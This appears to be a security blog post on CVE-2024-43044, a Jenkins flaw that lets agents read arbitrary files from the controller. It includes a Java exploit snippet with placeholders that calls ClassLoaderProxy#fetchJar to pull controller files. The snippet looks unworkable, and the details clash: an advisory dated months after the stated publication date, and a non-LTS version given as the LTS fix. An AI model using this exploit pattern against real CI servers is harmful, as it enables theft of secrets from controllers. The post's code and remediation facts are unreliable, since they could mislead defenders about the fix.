Jenkins, one of the most popular open-source CI/CD tools, has recently been identified with a security vulnerability (CVE-2024-43044) affecting versions 2.470 and earlier, as well as LTS 2.452.3 and earlier. This vulnerability allows agent processes to read arbitrary files from the Jenkins controller file system. In this post, we will dive into the exploit's details, discuss relevant code snippets, and provide links to original references.

Vulnerability Background

The core of the vulnerability lies within the ClassLoaderProxy#fetchJar method in the Remoting library, which is utilized by Jenkins to enable communication between its controllers and the agents. This method allows unauthorized agents to fetch arbitrary files from the controller file system, leading to potential security breaches, data leaks, and system compromise.

Exploit Details

To exploit this vulnerability, an attacker will need to have access to an unprivileged Jenkins agent. The attacker will then be able to use the ClassLoaderProxy#fetchJar method to request and obtain unauthorized files from the controller file system. The following is a code snippet demonstrating this exploit:

import hudson.remoting.ClassLoaderProxy;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;

public class CVE_2024_43044_Exploit {
    public static void main(String[] args) {
        File targetFile = new File("<filepath_on_controller>");
        ClassLoaderProxy proxy = new ClassLoaderProxy(<reference_to_the_proxy>);
        try {
            byte[] fileBytes = proxy.fetchJar(targetFile);
            try (FileOutputStream fos = new FileOutputStream(new File("<destination_filepath>"))) {
                fos.write(fileBytes);
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Replace <filepath_on_controller> with the file path of the target file on the Jenkins controller file system and <reference_to_the_proxy> with the reference to the ClassLoaderProxy. The attacker will then receive the unauthorized file on the specified <destination_filepath>.

The Jenkins project has officially acknowledged this vulnerability and issued an advisory recommending users to update their installations. For more information, please visit the following links:

1. Jenkins Security Advisory - https://www.jenkins.io/security/advisory/2024-10-22/
2. Jenkins issue tracker - https://issues.jenkins.io/browse/SECURITY-743

For Jenkins LTS users: Update to version 2.453 or later.

Updating your installation should prevent any unauthorized agent processes from reading arbitrary files from the controller file system.

Conclusion

The CVE-2024-43044 vulnerability in Jenkins poses a significant security threat that can lead to unauthorized file access, data leaks, and potentially full system compromise. It highlights the importance of continuously monitoring and updating software to protect sensitive information and maintain a robust security posture. Users of Jenkins should update their installations immediately as per the provided mitigation steps to safeguard their CI/CD pipelines from this vulnerability.

Timeline

Published on: 08/07/2024 14:15:33 UTC
Last modified on: 08/16/2024 17:19:30 UTC